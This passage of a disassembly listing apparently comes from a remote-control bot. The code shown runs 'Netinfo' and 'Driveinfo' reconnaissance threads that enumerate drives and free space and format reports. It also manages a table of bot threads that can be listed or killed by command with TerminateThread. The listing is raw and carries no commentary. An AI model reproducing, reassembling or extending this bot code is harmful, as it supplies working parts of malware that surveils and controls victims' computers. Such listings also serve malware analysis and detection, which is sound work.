loc_405F7A: ; CODE XREF: sub_405E4E+127�j
call sub_403289
test eax, eax
mov [ebp+var_10], edi
jnz short loc_405F89
mov [ebp+var_10], esi
loc_405F89: ; CODE XREF: sub_405E4E+136�j
call sub_405C57
cmp eax, 2EEh
mov [ebp+var_20], eax
mov ebx, offset aBad ; "Bad"
jnb short loc_405FA2
mov ebx, offset aAvarage ; "Avarage"
loc_405FA2: ; CODE XREF: sub_405E4E+14D�j
cmp eax, 1F4h
jnb short loc_405FAE
mov ebx, offset aGood ; "Good"
loc_405FAE: ; CODE XREF: sub_405E4E+159�j
call sub_405CC8
cmp [ebp+arg_0], 1
mov edx, offset byte_417B60
mov ecx, offset dword_4131C0
mov edi, edx
jz short loc_405FC7
mov edi, ecx
loc_405FC7: ; CODE XREF: sub_405E4E+175�j
cmp [ebp+var_14], 1
mov esi, edx
jz short loc_405FD1
mov esi, ecx
loc_405FD1: ; CODE XREF: sub_405E4E+17F�j
cmp dword ptr [ebp+var_8+4], 1
jnz short loc_405FD9
mov ecx, edx
loc_405FD9: ; CODE XREF: sub_405E4E+187�j
push edi
mov dword ptr [ebp+var_8], eax
push [ebp+arg_0]
lea eax, [ebp+var_28]
push esi
push [ebp+var_14]
push ecx
push dword ptr [ebp+var_8+4]
and dword ptr [ebp+var_8+4], 0
fild [ebp+var_8]
push ecx
push ecx
fmul ds:flt_411284
fstp [esp+0A80h+var_A80]
push [ebp+var_20]
push ebx
push [ebp+var_10]
push [ebp+var_18]
push eax
lea eax, [ebp+var_A8]
push eax
lea eax, [ebp+var_654]
push eax
push offset dword_413250
lea eax, [ebp+var_A54]
push 400h
push eax
call sub_41089E ; _snprintf
add esp, 48h
lea eax, [ebp+var_A54]
push eax
lea eax, [ebp+var_24C]
push offset dword_412B30
push eax
call sub_408D50
push [ebp+var_250]
call sub_406753
add esp, 10h
xor eax, eax
pop edi
pop esi
pop ebx
leave
retn 4
sub_405E4E endp
; =============== S U B R O U T I N E =======================================
sub_40605E proc near ; CODE XREF: sub_40735A+FED�p
arg_0 = dword ptr 4
push esi
push 1A7h
call sub_41082C ; malloc
mov esi, eax
pop ecx
test esi, esi
jz short loc_406094
push [esp+4+arg_0]
lea eax, [esi+4]
push eax
call sub_403E60
pop ecx
pop ecx
push offset aNetinfoThread ; "Netinfo thread"
push 0
push esi
push offset sub_405E4E
call sub_40663C
add esp, 10h
loc_406094: ; CODE XREF: sub_40605E+10�j
pop esi
retn
sub_40605E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406096 proc near ; CODE XREF: sub_40849F+141�p
; sub_40849F+213�p ...
var_1C = byte ptr -1Ch
var_14 = byte ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
mov eax, dword_413364
push esi
mov [ebp+var_4], eax
xor esi, esi
loc_4060A7: ; CODE XREF: sub_406096+73�j
lea eax, [ebp+var_4]
push eax
call ds:dword_4110D0 ; GetDriveTypeA
test eax, eax
jz short loc_406102
cmp eax, 1
jz short loc_406102
cmp eax, 5
jz short loc_4060DC
cmp eax, 2
jz short loc_4060DC
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_4]
push eax
call ds:dword_4110CC ; GetDiskFreeSpaceExA
jmp short loc_4060EC
; ---------------------------------------------------------------------------
loc_4060DC: ; CODE XREF: sub_406096+27�j
; sub_406096+2C�j
push 8
lea eax, [ebp+var_C]
push 0
push eax
call sub_410850 ; memset
add esp, 0Ch
loc_4060EC: ; CODE XREF: sub_406096+44�j
mov eax, [ebp+var_C]
mov edx, [ebp+var_8]
push 14h
pop ecx
call sub_4109F0
mov [ebp+var_C], eax
mov [ebp+var_8], edx
add esi, eax
loc_406102: ; CODE XREF: sub_406096+1D�j
; sub_406096+22�j
inc byte ptr [ebp+var_4]
cmp byte ptr [ebp+var_4], 5Ah
jnz short loc_4060A7
mov eax, esi
pop esi
leave
retn
sub_406096 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406110 proc near ; DATA XREF: sub_4062EC+29�o
var_5C8 = dword ptr -5C8h
var_5C4 = byte ptr -5C4h
var_420 = byte ptr -420h
var_40B = byte ptr -40Bh
var_20 = byte ptr -20h
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5C8h
push ebx
push esi
push edi
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_5C8]
push eax
call sub_410838 ; memcpy
push [ebp+arg_0]
call sub_410832 ; free
add esp, 10h
mov esi, offset aDriveInformati ; "Drive information - "
lea edi, [ebp+var_420]
xor eax, eax
push 5
xor ebx, ebx
pop ecx
mov [ebp+arg_0], ebx
rep movsd
movsb
mov ecx, 0FAh
lea edi, [ebp+var_40B]
rep stosd
mov esi, ds:dword_4111EC
mov [ebp+var_10], 1
stosw
stosb
mov eax, dword_413364
mov [ebp+var_4], eax
loc_406178: ; CODE XREF: sub_406110+172�j
lea eax, [ebp+var_4]
push eax
call ds:dword_4110D0 ; GetDriveTypeA
test eax, eax
jz loc_40627B
cmp eax, 1
jz loc_40627B
cmp eax, 2
jnz short loc_4061DC
mov edi, offset aRemovable ; "removable"
loc_40619D: ; CODE XREF: sub_406110+EE�j
push 8
lea eax, [ebp+var_C]
push 0
push eax
call sub_410850 ; memset
add esp, 0Ch
loc_4061AD: ; CODE XREF: sub_406110+115�j
mov eax, [ebp+var_C]
mov edx, [ebp+var_8]
push 14h
pop ecx
call sub_4109F0
cmp [ebp+var_10], 0
mov [ebp+var_C], eax
mov [ebp+var_8], edx
jnz short loc_406227
lea eax, [ebp+var_420]
push offset a_ ; ". "
push eax
call sub_410856 ; _mbscat
pop ecx
pop ecx
jmp short loc_40622B
; ---------------------------------------------------------------------------
loc_4061DC: ; CODE XREF: sub_406110+86�j
cmp eax, 3
jnz short loc_4061E8
mov edi, offset aFixed ; "fixed"
jmp short loc_40620F
; ---------------------------------------------------------------------------
loc_4061E8: ; CODE XREF: sub_406110+CF�j
cmp eax, 4
jnz short loc_4061F4
mov edi, offset aRemote ; "remote"
jmp short loc_40620F
; ---------------------------------------------------------------------------
loc_4061F4: ; CODE XREF: sub_406110+DB�j
cmp eax, 5
jnz short loc_406200
mov edi, offset aCdRom ; "cd-rom"
jmp short loc_40619D
; ---------------------------------------------------------------------------
loc_406200: ; CODE XREF: sub_406110+E7�j
cmp eax, 6
mov edi, offset aRamdisk ; "ramdisk"
jz short loc_40620F
mov edi, offset aUnknown ; "unknown"
loc_40620F: ; CODE XREF: sub_406110+D6�j
; sub_406110+E2�j ...
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_4]
push eax
call ds:dword_4110CC ; GetDiskFreeSpaceExA
jmp short loc_4061AD
; ---------------------------------------------------------------------------
loc_406227: ; CODE XREF: sub_406110+B5�j
and [ebp+var_10], 0
loc_40622B: ; CODE XREF: sub_406110+CA�j
mov eax, [ebp+var_C]
or eax, [ebp+var_8]
jz short loc_406258
push [ebp+var_8]
lea eax, [ebp+var_4]
push [ebp+var_C]
push edi
push eax
lea eax, [ebp+var_420]
push eax
lea eax, [ebp+var_420]
push offset dword_4133B0
push eax
call esi ; wsprintfA
add esp, 1Ch
jmp short loc_406275
; ---------------------------------------------------------------------------
loc_406258: ; CODE XREF: sub_406110+121�j
lea eax, [ebp+var_4]
push edi
push eax
lea eax, [ebp+var_420]
push eax
lea eax, [ebp+var_420]
push offset dword_4133A0
push eax
call esi ; wsprintfA
add esp, 14h
loc_406275: ; CODE XREF: sub_406110+146�j
add ebx, [ebp+var_C]
inc [ebp+arg_0]
loc_40627B: ; CODE XREF: sub_406110+74�j
; sub_406110+7D�j
inc byte ptr [ebp+var_4]
cmp byte ptr [ebp+var_4], 5Ah
jnz loc_406178
cmp [ebp+arg_0], 0
jz short loc_4062A1
lea eax, [ebp+var_420]
push offset a_ ; ". "
push eax
call sub_410856 ; _mbscat
pop ecx
pop ecx
loc_4062A1: ; CODE XREF: sub_406110+17C�j
push ebx
lea eax, [ebp+var_420]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_420]
push offset dword_413368
push eax
call esi ; wsprintfA
add esp, 14h
lea eax, [ebp+var_420]
push eax
lea eax, [ebp+var_5C4]
push offset dword_412B30
push eax
call sub_408D50
push [ebp+var_5C8]
call sub_406753
add esp, 10h
xor eax, eax
pop edi
pop esi
pop ebx
leave
retn 4
sub_406110 endp
; =============== S U B R O U T I N E =======================================
sub_4062EC proc near ; CODE XREF: sub_40735A+E4D�p
arg_0 = dword ptr 4
push esi
push 1A7h
call sub_41082C ; malloc
mov esi, eax
pop ecx
test esi, esi
jz short loc_406322
push [esp+4+arg_0]
lea eax, [esi+4]
push eax
call sub_403E60
pop ecx
pop ecx
push offset aDriveinfoThrea ; "Driveinfo thread"
push 0
push esi
push offset sub_406110
call sub_40663C
add esp, 10h
loc_406322: ; CODE XREF: sub_4062EC+10�j
pop esi
retn
sub_4062EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406324 proc near ; CODE XREF: seg000:00410706�p
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
lea eax, [ebp+var_10]
push eax
call ds:dword_4110DC ; QueryPerformanceCounter
lea eax, [ebp+var_8]
push eax
call ds:dword_4110D8 ; QueryPerformanceFrequency
xor eax, eax
cmp [ebp+var_C], eax
jl short loc_406385
jg short loc_40634C
cmp [ebp+var_10], eax
jbe short loc_406385
loc_40634C: ; CODE XREF: sub_406324+21�j
cmp [ebp+var_4], eax
jl short loc_406385
jg short loc_406358
cmp [ebp+var_8], eax
jbe short loc_406385
loc_406358: ; CODE XREF: sub_406324+2D�j
push [ebp+var_4]
push [ebp+var_8]
push [ebp+var_C]
push [ebp+var_10]
call sub_410A20
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], edx
fild [ebp+var_18]
push ecx
push ecx
fstp [esp+20h+var_20]
call sub_410A10 ; ceil
pop ecx
pop ecx
call sub_4109E8 ; _ftol
jmp short loc_406394
; ---------------------------------------------------------------------------
loc_406385: ; CODE XREF: sub_406324+1F�j
; sub_406324+26�j ...
call ds:dword_4110D4 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
loc_406394: ; CODE XREF: sub_406324+5F�j
mov dword_418000, eax
leave
retn
sub_406324 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40639B proc near ; CODE XREF: sub_4058D7+4F�p
; sub_40735A:loc_408242�p ...
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
lea eax, [ebp+var_10]
push eax
call ds:dword_4110DC ; QueryPerformanceCounter
lea eax, [ebp+var_8]
push eax
call ds:dword_4110D8 ; QueryPerformanceFrequency
xor eax, eax
cmp [ebp+var_C], eax
jl short loc_4063FC
jg short loc_4063C3
cmp [ebp+var_10], eax
jbe short loc_4063FC
loc_4063C3: ; CODE XREF: sub_40639B+21�j
cmp [ebp+var_4], eax
jl short loc_4063FC
jg short loc_4063CF
cmp [ebp+var_8], eax
jbe short loc_4063FC
loc_4063CF: ; CODE XREF: sub_40639B+2D�j
push [ebp+var_4]
push [ebp+var_8]
push [ebp+var_C]
push [ebp+var_10]
call sub_410A20
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], edx
fild [ebp+var_18]
push ecx
push ecx
fstp [esp+20h+var_20]
call sub_410A10 ; ceil
pop ecx
pop ecx
call sub_4109E8 ; _ftol
leave
retn
; ---------------------------------------------------------------------------
loc_4063FC: ; CODE XREF: sub_40639B+1F�j
; sub_40639B+26�j ...
call ds:dword_4110D4 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
leave
retn
sub_40639B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40640D proc near ; CODE XREF: sub_405E4E:loc_405EC6�p
; sub_40735A+F37�p
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
lea eax, [ebp+var_10]
push eax
call ds:dword_4110DC ; QueryPerformanceCounter
lea eax, [ebp+var_8]
push eax
call ds:dword_4110D8 ; QueryPerformanceFrequency
xor eax, eax
cmp [ebp+var_C], eax
jl short loc_40646E
jg short loc_406435
cmp [ebp+var_10], eax
jbe short loc_40646E
loc_406435: ; CODE XREF: sub_40640D+21�j
cmp [ebp+var_4], eax
jl short loc_40646E
jg short loc_406441
cmp [ebp+var_8], eax
jbe short loc_40646E
loc_406441: ; CODE XREF: sub_40640D+2D�j
push [ebp+var_4]
push [ebp+var_8]
push [ebp+var_C]
push [ebp+var_10]
call sub_410A20
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], edx
fild [ebp+var_18]
push ecx
push ecx
fstp [esp+20h+var_20]
call sub_410A10 ; ceil
pop ecx
pop ecx
call sub_4109E8 ; _ftol
jmp short loc_406474
; ---------------------------------------------------------------------------
loc_40646E: ; CODE XREF: sub_40640D+1F�j
; sub_40640D+26�j ...
call ds:dword_4110D4 ; GetTickCount
loc_406474: ; CODE XREF: sub_40640D+5F�j
sub eax, dword_418000
leave
retn
sub_40640D endp
; =============== S U B R O U T I N E =======================================
sub_40647C proc near ; CODE XREF: seg000:00410611�p
var_4 = dword ptr -4
and dword_418020, 0
push 1980h
call sub_41082C ; malloc
mov dword_418028, eax
mov [esp+4+var_4], offset dword_418008
call sub_406AB6
pop ecx
retn
sub_40647C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4064A0 proc near ; DATA XREF: sub_406541+25�o
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_411288
push offset sub_410ACA
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_4], 0
mov eax, [ebp+arg_0]
mov esi, [eax]
mov [ebp+var_20], esi
mov edi, [eax+4]
mov [ebp+var_1C], edi
push eax
call sub_410832 ; free
pop ecx
push esi
call ds:dword_4110E0 ; IsBadCodePtr
test eax, eax
jz short loc_406508
cmp dword_417B68, 0
jz short loc_40652A
push esi
push offset dword_413440
push offset dword_4177EC
call sub_408CDE
add esp, 0Ch
jmp short loc_40652A
; ---------------------------------------------------------------------------
loc_406508: ; CODE XREF: sub_4064A0+48�j
push edi
call esi ; wsprintfA
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_406530
; ---------------------------------------------------------------------------
push offset aBtg ; "btg"
push offset aThread ; "thread"
push [ebp+var_14]
call sub_40287C
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
loc_40652A: ; CODE XREF: sub_4064A0+51�j
; sub_4064A0+66�j
or [ebp+var_4], 0FFFFFFFFh
xor eax, eax
loc_406530: ; CODE XREF: sub_4064A0+6F�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_4064A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406541 proc near ; CODE XREF: sub_404F90+F9�p
; sub_406A80+21�p ...
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
push 8
call sub_41082C ; malloc
mov esi, eax
pop ecx
test esi, esi
jz short loc_406591
mov eax, [ebp+arg_0]
mov [esi], eax
mov eax, [ebp+arg_4]
mov [esi+4], eax
lea eax, [ebp+var_4]
push eax
push 0
push esi
push offset sub_4064A0
push 20000h
push 0
call sub_410AD0 ; _beginthreadex
add esp, 18h
test eax, eax
jz short loc_40658A
push eax
call ds:dword_4110AC ; CloseHandle
push 1
pop eax
jmp short loc_406593
; ---------------------------------------------------------------------------
loc_40658A: ; CODE XREF: sub_406541+3B�j
push esi
call sub_410832 ; free
pop ecx
loc_406591: ; CODE XREF: sub_406541+11�j
xor eax, eax
loc_406593: ; CODE XREF: sub_406541+47�j
pop esi
leave
retn
sub_406541 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406596 proc near ; DATA XREF: sub_40663C+C9�o
var_1A0 = dword ptr -1A0h
var_19C = byte ptr -19Ch
var_19B = byte ptr -19Bh
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_411298
push offset sub_410ACA
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 190h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov al, byte_417B60
mov [ebp+var_19C], al
push 60h
pop ecx
xor eax, eax
lea edi, [ebp+var_19B]
rep stosd
stosw
stosb
and [ebp+var_4], 0
mov esi, [ebp+arg_0]
mov eax, [esi]
mov ecx, [eax+10h]
mov [ebp+var_1A0], ecx
add eax, 14h
push eax
lea eax, [ebp+var_19C]
push eax
call sub_410820 ; _mbscpy
pop ecx
pop ecx
mov eax, [esi]
push esi
call dword ptr [eax+10h]
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_40662B
; ---------------------------------------------------------------------------
lea eax, [ebp+var_19C]
push eax
push offset aThread ; "thread"
push [ebp+var_14]
call sub_40287C
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
xor eax, eax
loc_40662B: ; CODE XREF: sub_406596+72�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_406596 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40663C proc near ; CODE XREF: sub_4014B0+79�p
; sub_4018D5+78�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
push offset dword_418008
call sub_406AE4
cmp dword_418020, 10h
pop ecx
jnz short loc_406667
push [ebp+arg_4]
call sub_410832 ; free
pop ecx
xor ebx, ebx
jmp loc_406741
; ---------------------------------------------------------------------------
loc_406667: ; CODE XREF: sub_40663C+19�j
mov ecx, dword_418028
xor ebx, ebx
cmp [ebp+arg_8], ebx
mov edi, 198h
jz short loc_40668D
xor edx, edx
lea eax, [ecx+10h]
loc_40667E: ; CODE XREF: sub_40663C+4F�j
mov esi, [ebp+arg_0]
cmp [eax], esi
jz short loc_4066A1
inc edx
add eax, edi
cmp edx, 10h
jl short loc_40667E
loc_40668D: ; CODE XREF: sub_40663C+3B�j
mov [ebp+var_4], ebx
xor edx, edx
lea eax, [ecx+8]
loc_406695: ; CODE XREF: sub_40663C+63�j
cmp [eax], ebx
jz short loc_4066AF
inc edx
add eax, edi
cmp edx, 10h
jl short loc_406695
loc_4066A1: ; CODE XREF: sub_40663C+47�j
; sub_40663C+82�j
push [ebp+arg_4]
call sub_410832 ; free
pop ecx
jmp loc_406741
; ---------------------------------------------------------------------------
loc_4066AF: ; CODE XREF: sub_40663C+5B�j
mov eax, edx
imul eax, 198h
add eax, ecx
mov [ebp+var_4], eax
mov [eax], edx
jz short loc_4066A1
mov esi, [ebp+arg_4]
mov eax, [ebp+var_4]
cmp esi, ebx
jz short loc_4066CC
mov [esi], eax
loc_4066CC: ; CODE XREF: sub_40663C+8C�j
mov ecx, [ebp+arg_0]
mov [eax+10h], ecx
lea eax, [ebp+arg_10]
push eax
mov eax, [ebp+var_4]
push [ebp+arg_C]
add eax, 14h
push eax
call sub_410AD6 ; vsprintf
mov eax, [ebp+var_4]
add esp, 0Ch
mov ecx, esi
mov [eax+4], ebx
inc dword_418020
mov eax, [ebp+var_4]
cmp esi, ebx
jnz short loc_4066FF
mov ecx, eax
loc_4066FF: ; CODE XREF: sub_40663C+BF�j
add eax, 0Ch
push eax
push ebx
push ecx
push offset sub_406596
push ebx
push ebx
call sub_410AD0 ; _beginthreadex
mov ecx, [ebp+var_4]
add esp, 18h
mov [ecx+8], eax
mov eax, [ebp+var_4]
cmp [eax+8], ebx
jnz short loc_40673E
push esi
call sub_410832 ; free
dec dword_418020
push edi
lea eax, [ebp+var_4]
push ebx
push eax
call sub_410850 ; memset
add esp, 10h
jmp short loc_406741
; ---------------------------------------------------------------------------
loc_40673E: ; CODE XREF: sub_40663C+E4�j
push 1
pop ebx
loc_406741: ; CODE XREF: sub_40663C+26�j
; sub_40663C+6E�j ...
push offset dword_418008
call sub_406AEF
pop ecx
pop edi
mov eax, ebx
pop esi
pop ebx
leave
retn
sub_40663C endp
; =============== S U B R O U T I N E =======================================
sub_406753 proc near ; CODE XREF: sub_4011C4+2DE�p
; sub_401621+277�p ...
arg_0 = dword ptr 4
push esi
mov esi, offset dword_418008
push edi
push esi
call sub_406AE4
mov edi, [esp+0Ch+arg_0]
dec dword_418020
pop ecx
push dword ptr [edi+8]
call ds:dword_4110AC ; CloseHandle
push 198h
push 0
push edi
call sub_410850 ; memset
push esi
call sub_406AEF
add esp, 10h
pop edi
pop esi
retn
sub_406753 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40678D proc near ; CODE XREF: sub_40735A+6B3�p
var_188 = byte ptr -188h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 188h
push esi
mov esi, [ebp+arg_0]
test esi, esi
push edi
jz loc_406864
push esi
call sub_4052D4
test al, al
pop ecx
jz short loc_4067EB
push esi
call sub_41088C ; atoi
mov edi, offset dword_418008
mov esi, eax
push edi
call sub_406AE4
pop ecx
cmp esi, 10h
pop ecx
jnb short loc_4067E2
imul esi, 198h
mov eax, dword_418028
add eax, esi
cmp dword ptr [eax+8], 0
jz short loc_4067E2
mov dword ptr [eax+4], 1
loc_4067E2: ; CODE XREF: sub_40678D+39�j
; sub_40678D+4C�j
push edi
call sub_406AEF
pop ecx
jmp short loc_406864
; ---------------------------------------------------------------------------
loc_4067EB: ; CODE XREF: sub_40678D+1F�j
push ebx
push esi
push offset aS ; "*%s*"
lea eax, [ebp+var_188]
push 185h
push eax
call sub_41089E ; _snprintf
mov edi, offset dword_418008
push edi
call sub_406AE4
mov ebx, dword_418020
add esp, 14h
xor esi, esi
loc_406819: ; CODE XREF: sub_40678D+CD�j
mov eax, dword_418028
add eax, esi
cmp dword ptr [eax+8], 0
jz short loc_40684E
lea ecx, [ebp+var_188]
add eax, 14h
push ecx
push eax
dec ebx
call sub_4071EF
pop ecx
test al, al
pop ecx
jz short loc_40684A
mov eax, dword_418028
mov dword ptr [esi+eax+4], 1
loc_40684A: ; CODE XREF: sub_40678D+AE�j
test ebx, ebx
jz short loc_40685C
loc_40684E: ; CODE XREF: sub_40678D+97�j
add esi, 198h
cmp esi, 1980h
jb short loc_406819
loc_40685C: ; CODE XREF: sub_40678D+BF�j
push edi
call sub_406AEF
pop ecx
pop ebx
loc_406864: ; CODE XREF: sub_40678D+10�j
; sub_40678D+5C�j
pop edi
pop esi
leave
retn
sub_40678D endp
; =============== S U B R O U T I N E =======================================
sub_406868 proc near ; CODE XREF: sub_40735A+6E4�p
var_18C = dword ptr -18Ch
var_188 = byte ptr -188h
arg_0 = dword ptr 4
sub esp, 18Ch
push ebp
push esi
mov esi, [esp+194h+arg_0]
xor ebp, ebp
cmp esi, ebp
push edi
jz loc_406989
push esi
call sub_4052D4
test al, al
pop ecx
jz short loc_4068EC
push esi
call sub_41088C ; atoi
mov edi, offset dword_418008
mov esi, eax
push edi
call sub_406AE4
pop ecx
cmp esi, 10h
pop ecx
jnb short loc_4068E0
imul esi, 198h
mov eax, dword_418028
add eax, esi
cmp [eax+8], ebp
jz short loc_4068E0
dec dword_418020
mov esi, [eax+8]
push 198h
push ebp
push eax
call sub_410850 ; memset
add esp, 0Ch
push ebp
push esi
call ds:dword_4110E4 ; TerminateThread
push esi
call ds:dword_4110AC ; CloseHandle
loc_4068E0: ; CODE XREF: sub_406868+3D�j
; sub_406868+4F�j
push edi
call sub_406AEF
pop ecx
jmp loc_406989
; ---------------------------------------------------------------------------
loc_4068EC: ; CODE XREF: sub_406868+23�j
push ebx
push esi
push offset aS ; "*%s*"
lea eax, [esp+1A4h+var_188]
push 185h
push eax
call sub_41089E ; _snprintf
push offset dword_418008
call sub_406AE4
mov eax, dword_418020
add esp, 14h
mov [esp+19Ch+var_18C], eax
xor edi, edi
mov ebx, 198h
loc_40691F: ; CODE XREF: sub_406868+113�j
mov eax, dword_418028
add eax, edi
cmp [eax+8], ebp
jz short loc_406973
dec [esp+19Ch+var_18C]
lea ecx, [esp+19Ch+var_188]
add eax, 14h
push ecx
push eax
call sub_4071EF
pop ecx
test al, al
pop ecx
jz short loc_40696D
mov eax, dword_418028
dec dword_418020
add eax, edi
push ebx
push ebp
push eax
mov esi, [eax+8]
call sub_410850 ; memset
add esp, 0Ch
push ebp
push esi
call ds:dword_4110E4 ; TerminateThread
push esi
call ds:dword_4110AC ; CloseHandle
loc_40696D: ; CODE XREF: sub_406868+D9�j
cmp [esp+19Ch+var_18C], ebp
jz short loc_40697D
loc_406973: ; CODE XREF: sub_406868+C1�j
add edi, ebx
cmp edi, 1980h
jb short loc_40691F
loc_40697D: ; CODE XREF: sub_406868+109�j
push offset dword_418008
call sub_406AEF
pop ecx
pop ebx
loc_406989: ; CODE XREF: sub_406868+14�j
; sub_406868+7F�j
pop edi
pop esi
pop ebp
add esp, 18Ch
retn
sub_406868 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406993 proc near ; DATA XREF: sub_406A80+1C�o
var_1B0 = dword ptr -1B0h
var_1A4 = byte ptr -1A4h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A4h
push 1A3h
lea eax, [ebp+var_1A4]
push [ebp+arg_0]
push eax
call sub_410838 ; memcpy
push [ebp+arg_0]
call sub_410832 ; free
mov eax, dword_418020
add esp, 10h
test eax, eax
jz loc_406A67
push esi
push edi
push 10h
push eax
lea eax, [ebp+var_1A4]
push offset dword_4134B8
push eax
call sub_408D50
mov esi, offset dword_418008
push esi
call sub_406AE4
and [ebp+var_C], 0
and [ebp+arg_0], 0
add esp, 14h
xor edi, edi
loc_4069F6: ; CODE XREF: sub_406993+C5�j
mov eax, dword_418028
cmp dword ptr [edi+eax+8], 0
jz short loc_406A49
push esi
call sub_406AEF
mov [esp+1B0h+var_1B0], 3E8h
call ds:dword_4110A4 ; Sleep
push esi
call sub_406AE4
mov eax, dword_418028
pop ecx
lea eax, [edi+eax+14h]
push eax
lea eax, [ebp+var_1A4]
push [ebp+arg_0]
push offset dword_4134A8
push eax
call sub_408D50
mov eax, dword_418028
add esp, 10h
cmp dword ptr [edi+eax+4], 0
jnz short loc_406A5A
loc_406A49: ; CODE XREF: sub_406993+6D�j
inc [ebp+arg_0]
add edi, 198h
cmp edi, 1980h
jl short loc_4069F6
loc_406A5A: ; CODE XREF: sub_406993+B4�j
push esi
call sub_406AEF
pop ecx
pop edi
xor eax, eax
pop esi
jmp short locret_406A7C
; ---------------------------------------------------------------------------
loc_406A67: ; CODE XREF: sub_406993+2F�j
lea eax, [ebp+var_1A4]
push offset dword_413488
push eax
call sub_408D50
pop ecx
xor eax, eax
pop ecx
locret_406A7C: ; CODE XREF: sub_406993+D2�j
leave
retn 4
sub_406993 endp
; =============== S U B R O U T I N E =======================================
sub_406A80 proc near ; CODE XREF: sub_40735A+474�p
arg_0 = dword ptr 4
push esi
push 1A3h
call sub_41082C ; malloc
test eax, eax
pop ecx
jz short loc_406AB4
mov esi, [esp+4+arg_0]
push esi
push eax
call sub_403E60
push esi
push offset sub_406993
call sub_406541
add esp, 10h
test eax, eax
jnz short loc_406AB4
push esi
call sub_410832 ; free
pop ecx
loc_406AB4: ; CODE XREF: sub_406A80+E�j
; sub_406A80+2B�j
pop esi
retn
sub_406A80 endp
; =============== S U B R O U T I N E =======================================
sub_406AB6 proc near ; CODE XREF: sub_403E9B+6�p
; sub_40647C+1D�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 18h
push 0
push esi
call sub_410850 ; memset
mov eax, dword_417B70
add esp, 0Ch
test eax, eax
jz short loc_406ADB
push 80000400h
push esi
call eax ; InitializeCriticalSectionAndSpinCount
pop esi
retn
; ---------------------------------------------------------------------------
loc_406ADB: ; CODE XREF: sub_406AB6+19�j
push esi
call ds:dword_4110E8 ; InitializeCriticalSection
pop esi
retn
sub_406AB6 endp
; =============== S U B R O U T I N E =======================================
sub_406AE4 proc near ; CODE XREF: sub_403F1D+11�p
; sub_40663C+C�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call ds:dword_4110EC ; RtlEnterCriticalSection
retn
sub_406AE4 endp
; =============== S U B R O U T I N E =======================================
sub_406AEF proc near ; CODE XREF: sub_403F1D+20E�p
; sub_40663C+10A�p ...
arg_0 = dword ptr 4
